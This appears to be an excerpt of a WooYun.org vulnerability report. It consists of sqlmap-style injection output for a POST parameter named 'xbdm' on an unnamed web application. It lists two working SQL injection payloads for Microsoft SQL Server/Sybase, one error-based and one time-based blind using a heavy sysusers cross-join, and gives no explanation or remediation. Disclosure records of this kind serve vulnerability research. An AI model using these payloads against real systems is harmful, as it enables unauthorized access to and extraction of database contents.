WooYun.org

Place: POST
Parameter: xbdm
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: xbdm=-8429' OR 1482=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(11
7)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1482=1482) THEN CHAR(49) ELSE CHAR(48
) END))+CHAR(113)+CHAR(100)+CHAR(116)+CHAR(98)+CHAR(113))) AND 'yJbM'='yJbM
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: xbdm=-3798' OR 2895=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers
 AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys
users AS sys7) AND 'jYNs'='jYNs